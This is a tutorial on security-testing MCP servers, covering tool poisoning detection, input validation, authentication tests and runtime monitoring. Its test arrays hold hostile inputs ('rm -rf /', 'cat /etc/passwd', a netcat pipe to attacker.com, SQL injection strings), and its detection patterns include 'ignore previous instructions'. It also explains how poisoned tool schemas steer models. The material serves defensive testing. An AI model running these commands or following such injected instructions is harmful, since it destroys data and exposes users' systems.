The Quick Answer
Test MCP server security by scanning for tool poisoning attacks, validating input sanitization, and verifying authentication flows:
# Install MCP security scanner$npm install -g @invariantlabs/mcp-scan# Run comprehensive security scan$mcp-scan --server ./server.js --mode full
# Test for command injection vulnerabilities
def test_command_injection():
malicious_input = "test; rm -rf /"
response = mcp_client.call_tool("execute", {
"command": malicious_input
})
assert "permission denied" in response.error
MCP servers face unique security challenges from tool poisoning and prompt injection attacks. Regular security testing prevents data exfiltration and unauthorized system access.
Prerequisites
- Node.js 18+ or Python 3.8+ installed
- MCP server implementation to test
- Basic understanding of JSON-RPC protocol
- Access to security testing tools (mcp-scan, pytest)
Installation
Install the essential security testing tools for comprehensive MCP server validation:
# MCP security scanner for automated vulnerability detection$npm install -g @invariantlabs/mcp-scan# Python testing framework with security extensions$pip install pytest pytest-security mcp-client# JSON-RPC fuzzing tool for protocol testing$npm install -g rpc-fuzzer
Understanding MCP Security Threats
MCP servers operate as bridges between AI models and sensitive systems, creating unique attack vectors. Tool poisoning attacks embed malicious instructions within tool descriptions that remain invisible to users but influence AI behavior. Command injection vulnerabilities arise when servers pass unsanitized inputs to system commands or databases.
The most critical threats include Full-Schema Poisoning (FSP), where attackers manipulate entire tool schemas beyond just descriptions. This extends to tool names, parameter types, default values, and enumeration options. Traditional security measures often miss these vectors because they focus solely on input validation rather than schema integrity.
Tool Poisoning Detection
Tool poisoning represents the most insidious threat to MCP servers. Attackers hide malicious prompts within tool metadata that AI models process but users never see. These attacks bypass traditional security controls by exploiting the trust relationship between models and tool descriptions.
import json
from mcp_client import MCPClient
def detect_tool_poisoning(server_url):
"""Scan MCP server tools for hidden malicious instructions"""
client = MCPClient(server_url)
tools = client.list_tools()
suspicious_patterns = [
r"ignore previous instructions",
r"<system>.*</system>",
r"IMPORTANT:.*MUST",
r"\x1b\[.*m", # ANSI escape sequences
r"base64\.b64decode"
]
vulnerabilities = []
for tool in tools:
# Check all schema fields, not just descriptions
schema_text = json.dumps(tool, default=str)
for pattern in suspicious_patterns:
if re.search(pattern, schema_text, re.IGNORECASE):
vulnerabilities.append({
"tool": tool["name"],
"pattern": pattern,
"severity": "high"
})
return vulnerabilities
# Usage in test suite
def test_no_tool_poisoning():
vulns = detect_tool_poisoning("http://localhost:8000")
assert len(vulns) == 0, f"Found tool poisoning: {vulns}"
Advanced poisoning techniques use Unicode homoglyphs or zero-width characters to hide payloads. The detection must examine raw bytes rather than rendered text. Schema validation should enforce strict typing and reject fields containing linguistic instructions disguised as configuration.
Input Validation Testing
MCP servers frequently execute system commands or database queries based on AI-generated inputs. Without proper sanitization, these become vectors for command injection attacks. Testing must verify that all user inputs undergo appropriate validation before processing.
// Comprehensive input validation test suite
const { MCPTestClient } = require('@mcp/test-utils');
describe('Input Validation Security', () => {
let client;
beforeEach(() => {
client = new MCPTestClient('http://localhost:3000');
});
test('prevents command injection in shell tools', async () => {
const maliciousInputs = [
'valid.txt; cat /etc/passwd',
'test`whoami`',
'file$(rm -rf /)',
'test\nrm -rf /',
'test|nc attacker.com 4444'
];
for (const input of maliciousInputs) {
const response = await client.callTool('file_read', {
path: input
});
// Should either sanitize or reject malicious input
expect(response.error || response.sanitized).toBeTruthy();
expect(response.output).not.toContain('passwd');
}
});
test('prevents SQL injection in database tools', async () => {
const sqlInjectionPayloads = [
"'; DROP TABLE users; --",
"1' OR '1'='1",
"admin'--",
"1; INSERT INTO admins VALUES ('hacker', 'password')"
];
for (const payload of sqlInjectionPayloads) {
const response = await client.callTool('db_query', {
query: `SELECT * FROM users WHERE id = '${payload}'`
});
// Must use parameterized queries
expect(response.error?.code).toBe('INVALID_QUERY');
}
});
});
Effective input validation combines multiple layers: type checking, length limits, character whitelisting, and context-aware sanitization. The server should log all rejected inputs for security monitoring while avoiding information disclosure in error messages.
Authentication Flow Testing
MCP servers implementing OAuth 2.0 or custom authentication require thorough testing of token handling, session management, and authorization boundaries. Security tests must verify that authentication cannot be bypassed and that tokens properly scope access.
import asyncio
import jwt
from datetime import datetime, timedelta
class MCPAuthTester:
def __init__(self, server_url, auth_endpoint):
self.server_url = server_url
self.auth_endpoint = auth_endpoint
async def test_token_validation(self):
"""Verify server properly validates JWT tokens"""
test_cases = []
# Test 1: Expired token
expired_token = jwt.encode({
"exp": datetime.utcnow() - timedelta(hours=1),
"sub": "test_user"
}, "wrong_secret", algorithm="HS256")
test_cases.append({
"name": "expired_token",
"token": expired_token,
"expected_error": "TOKEN_EXPIRED"
})
# Test 2: Invalid signature
invalid_sig_token = jwt.encode({
"exp": datetime.utcnow() + timedelta(hours=1),
"sub": "test_user"
}, "wrong_secret", algorithm="HS256")
test_cases.append({
"name": "invalid_signature",
"token": invalid_sig_token,
"expected_error": "INVALID_SIGNATURE"
})
# Test 3: Missing required claims
incomplete_token = jwt.encode({
"exp": datetime.utcnow() + timedelta(hours=1)
# Missing 'sub' claim
}, "correct_secret", algorithm="HS256")
test_cases.append({
"name": "missing_claims",
"token": incomplete_token,
"expected_error": "MISSING_CLAIMS"
})
results = []
for test in test_cases:
response = await self._make_authenticated_request(
test["token"]
)
results.append({
"test": test["name"],
"passed": response.get("error") == test["expected_error"]
})
return results
async def test_authorization_boundaries(self):
"""Ensure users cannot access resources beyond their scope"""
# Get tokens with different permission levels
user_token = await self._get_token("user", ["read"])
admin_token = await self._get_token("admin", ["read", "write", "delete"])
# Test user cannot perform admin actions
user_response = await self._call_tool(
"delete_resource",
{"id": "sensitive_123"},
user_token
)
assert user_response["error"] == "INSUFFICIENT_PERMISSIONS"
# Test admin can perform restricted actions
admin_response = await self._call_tool(
"delete_resource",
{"id": "sensitive_123"},
admin_token
)
assert admin_response["success"] == True
Authentication testing extends beyond token validation to session fixation, concurrent session limits, and secure token storage. MCP clients often store tokens in configuration files, requiring tests to verify these are properly encrypted and access-controlled.
Vulnerability Scanning Automation
Automated scanning provides continuous security validation as MCP servers evolve. Integration with CI/CD pipelines ensures vulnerabilities are caught before deployment. Comprehensive scanning combines static analysis, dynamic testing, and behavioral monitoring.
#!/bin/bash# Automated MCP security scanning pipeline# Static analysis of tool definitions$echo "Running static security analysis..."$mcp-scan analyze --server ./dist/server.js \$ --checks tool-poisoning,schema-validation \$ --output reports/static-analysis.json# Dynamic runtime testing$echo "Starting server for dynamic testing..."$npm start &$SERVER_PID=$!$sleep 5# Fuzzing tool inputs$echo "Fuzzing MCP tool parameters..."$rpc-fuzzer --target http://localhost:3000/rpc \$ --wordlist ./security/fuzzing-payloads.txt \$ --timeout 30 \$ --report reports/fuzzing-results.json# Authentication bypass attempts$echo "Testing authentication mechanisms..."$python -m pytest tests/security/test_auth.py \$ --json-report --json-report-file=reports/auth-test.json# Cleanup$kill $SERVER_PID# Generate consolidated report$mcp-scan report --input reports/ --format html > security-report.html
Modern scanning tools use machine learning to identify novel attack patterns. They analyze response timing to detect blind injection vulnerabilities and monitor resource usage to identify denial-of-service vectors. Regular scanning with updated threat databases ensures protection against emerging attacks.
Runtime Security Monitoring
Production MCP servers require continuous monitoring to detect attacks that bypass initial defenses. Runtime protection combines anomaly detection, rate limiting, and automated response to suspicious activities.
const { MCPSecurityMonitor } = require('@mcp/security');
class ProductionSecurityLayer {
constructor(mcpServer) {
this.server = mcpServer;
this.monitor = new MCPSecurityMonitor();
this.setupMonitoring();
}
setupMonitoring() {
// Track tool invocation patterns
this.server.on('tool:invoke', async (event) => {
const analysis = await this.monitor.analyzeInvocation({
tool: event.tool,
params: event.params,
caller: event.session.user,
timestamp: Date.now()
});
if (analysis.risk > 0.8) {
// High risk - block and alert
event.preventDefault();
await this.alertSecurityTeam({
severity: 'critical',
event: event,
analysis: analysis
});
} else if (analysis.risk > 0.5) {
// Medium risk - log and rate limit
await this.monitor.incrementRiskScore(event.session);
console.warn(`Suspicious activity: ${analysis.reason}`);
}
});
// Detect anomalous data access patterns
this.server.on('data:access', (event) => {
const accessPattern = this.monitor.getAccessPattern(event.session);
if (accessPattern.isAnomalous) {
// Possible data exfiltration attempt
this.applyRateLimit(event.session, {
requests: 10,
window: '1m'
});
}
});
// Monitor for privilege escalation
this.server.on('auth:elevate', async (event) => {
const legitimateElevation = await this.monitor.verifyElevation({
user: event.user,
requestedScope: event.newScope,
context: event.context
});
if (!legitimateElevation) {
event.preventDefault();
await this.lockAccount(event.user);
}
});
}
}
Effective monitoring correlates events across multiple dimensions: temporal patterns, data volumes, error rates, and user behavior. Machine learning models trained on normal usage patterns can identify subtle attacks that rule-based systems miss.
Common Issues
Error: Tool enumeration exposes sensitive operations
MCP servers often expose all available tools without considering the security implications. Attackers use tool discovery to map attack surfaces and identify high-value targets. Implement tool filtering based on authentication level:
def filter_tools_by_permission(tools, user_permissions):
"""Remove sensitive tools from enumeration based on user permissions"""
filtered = []
for tool in tools:
required_perms = tool.get("required_permissions", [])
if all(perm in user_permissions for perm in required_perms):
# Strip internal metadata before returning
public_tool = {
"name": tool["name"],
"description": tool["description"],
"parameters": tool["parameters"]
}
filtered.append(public_tool)
return filtered
The solution involves implementing role-based tool visibility and removing internal implementation details from public tool descriptions. This prevents attackers from gathering intelligence about system internals while maintaining functionality for authorized users.
Error: Rate limiting not applied to JSON-RPC batch requests
Batch requests in JSON-RPC allow multiple method calls in a single HTTP request, potentially bypassing rate limits. Attackers exploit this to overwhelm servers or brute-force authentication. Proper rate limiting must account for the total operations within batch requests:
function applyBatchAwareRateLimit(request, rateLimiter) {
let operationCount = 1;
if (Array.isArray(request)) {
// Batch request - count all operations
operationCount = request.length;
}
// Check if user exceeds rate limit
const allowed = rateLimiter.checkLimit(
request.session.userId,
operationCount
);
if (!allowed) {
throw new Error("Rate limit exceeded");
}
// Process request...
}
Implement rate limiting at multiple levels: per-operation, per-request, and per-session. Consider the computational cost of different operations when setting limits. Database queries might have lower limits than simple data retrievals.
Error: Insecure direct object references in tool parameters
Tools accepting resource IDs without proper authorization checks enable unauthorized access. An attacker might enumerate IDs to access other users' data. Always verify ownership and permissions before processing resource operations:
async def secure_resource_access(resource_id, user_id, operation):
"""Verify user has permission to access resource"""
# First check if resource exists
resource = await db.get_resource(resource_id)
if not resource:
raise NotFoundException("Resource not found")
# Verify ownership or explicit permissions
if resource.owner_id != user_id:
permission = await db.check_permission(
user_id,
resource_id,
operation
)
if not permission:
# Log attempted unauthorized access
await security_log.record({
"event": "unauthorized_access_attempt",
"user": user_id,
"resource": resource_id,
"operation": operation
})
raise ForbiddenException("Access denied")
return resource
Examples
Comprehensive Security Test Suite
A production-ready security test suite for MCP servers combines multiple testing approaches. This example demonstrates integration of tool poisoning detection, input validation, and authentication testing into a unified framework:
import pytest
import asyncio
from mcp_security_tester import SecurityTester
class TestMCPServerSecurity:
@pytest.fixture
def security_tester(self):
return SecurityTester("http://localhost:8000")
@pytest.mark.asyncio
async def test_complete_security_validation(self, security_tester):
# Phase 1: Static analysis
static_results = await security_tester.run_static_analysis()
assert static_results["tool_poisoning_found"] == 0
assert static_results["unsafe_patterns_found"] == 0
# Phase 2: Dynamic testing
dynamic_results = await security_tester.run_dynamic_tests([
"command_injection",
"sql_injection",
"path_traversal",
"xxe_injection"
])
for test_name, result in dynamic_results.items():
assert result["blocked"] == True, \
f"Failed to block {test_name} attack"
# Phase 3: Authentication testing
auth_results = await security_tester.test_authentication([
"token_replay",
"session_fixation",
"privilege_escalation"
])
assert all(r["passed"] for r in auth_results)
# Phase 4: Fuzzing
fuzz_results = await security_tester.fuzz_parameters(
iterations=1000,
timeout=300
)
assert fuzz_results["crashes"] == 0
assert fuzz_results["errors_handled"] == fuzz_results["errors_total"]
The test suite executes in CI/CD pipelines before each deployment. It generates detailed reports highlighting specific vulnerabilities and provides remediation guidance. Regular execution ensures security regressions are caught immediately.
Production Security Monitoring Dashboard
Real-world MCP deployments require visibility into security events. This monitoring implementation tracks suspicious activities and provides alerting for security teams:
const express = require('express');
const { MCPServer } = require('@modelcontextprotocol/server');
const { SecurityDashboard } = require('./security-dashboard');
// Initialize MCP server with security monitoring
const server = new MCPServer({
middleware: [
securityLogging,
rateLimiting,
authenticationCheck
]
});
// Security monitoring middleware
async function securityLogging(req, res, next) {
const startTime = Date.now();
// Capture request details
const requestInfo = {
method: req.body.method,
params: req.body.params,
ip: req.ip,
userAgent: req.headers['user-agent'],
timestamp: new Date()
};
// Check for suspicious patterns
const threats = await detectThreats(requestInfo);
if (threats.length > 0) {
await dashboard.recordThreat({
request: requestInfo,
threats: threats,
action: 'blocked'
});
return res.status(403).json({
error: "Security policy violation"
});
}
// Continue with request
next();
// Log response metrics
res.on('finish', () => {
dashboard.recordMetric({
method: requestInfo.method,
duration: Date.now() - startTime,
status: res.statusCode
});
});
}
// Threat detection logic
async function detectThreats(requestInfo) {
const threats = [];
// Check for tool poisoning indicators
const paramsStr = JSON.stringify(requestInfo.params);
if (paramsStr.match(/system\]|ignore previous|IMPORTANT:/i)) {
threats.push({
type: 'tool_poisoning',
severity: 'high',
indicator: 'suspicious_prompt_pattern'
});
}
// Detect potential command injection
if (paramsStr.match(/[;&|`$()]/)) {
threats.push({
type: 'command_injection',
severity: 'medium',
indicator: 'shell_metacharacters'
});
}
// Check request rate
const recentRequests = await dashboard.getRecentRequests(
requestInfo.ip,
60 // last 60 seconds
);
if (recentRequests > 100) {
threats.push({
type: 'rate_limit_abuse',
severity: 'low',
indicator: `${recentRequests} requests in 60s`
});
}
return threats;
}
// Start monitoring dashboard
const dashboard = new SecurityDashboard({
port: 3001,
alertWebhook: process.env.SECURITY_WEBHOOK
});
dashboard.start();
Production monitoring generates actionable insights through correlation of security events. The dashboard visualizes attack patterns, highlights anomalies, and enables rapid incident response. Integration with SIEM systems provides enterprise-wide security visibility.
With monitoring established, security teams can identify attack campaigns targeting MCP infrastructure. Pattern analysis reveals coordinated attempts to exploit specific vulnerabilities across multiple servers. This intelligence drives proactive defense improvements.
Testing Best Practices
Effective MCP security testing follows established methodologies while adapting to protocol-specific challenges. Tests should run continuously, not just during development. Automate wherever possible but maintain human oversight for complex attack scenarios.
Structure tests to fail safely - a broken test should block deployment rather than allow potentially vulnerable code through. Use test data that mirrors production complexity without containing actual sensitive information. Regular rotation of test credentials prevents long-term exposure if test environments are compromised.
Document all security findings with clear reproduction steps and impact assessments. This enables developers to understand and fix issues efficiently. Track metrics like time-to-remediation and vulnerability recurrence to improve security processes over time.
Document all security findings with clear reproduction steps and impact assessments. This enables developers to understand and fix issues efficiently. Track metrics like time-to-remediation and vulnerability recurrence to improve security processes over time.
Related Guides
Writing unit tests for MCP servers
Write effective unit tests for MCP servers using in-memory patterns and testing frameworks.
Validation tests for tool inputs
Write validation tests for MCP tool inputs covering schema validation and type checking.
Integration tests for MCP flows
Write end-to-end integration tests for MCP workflows to validate client-server communication flows.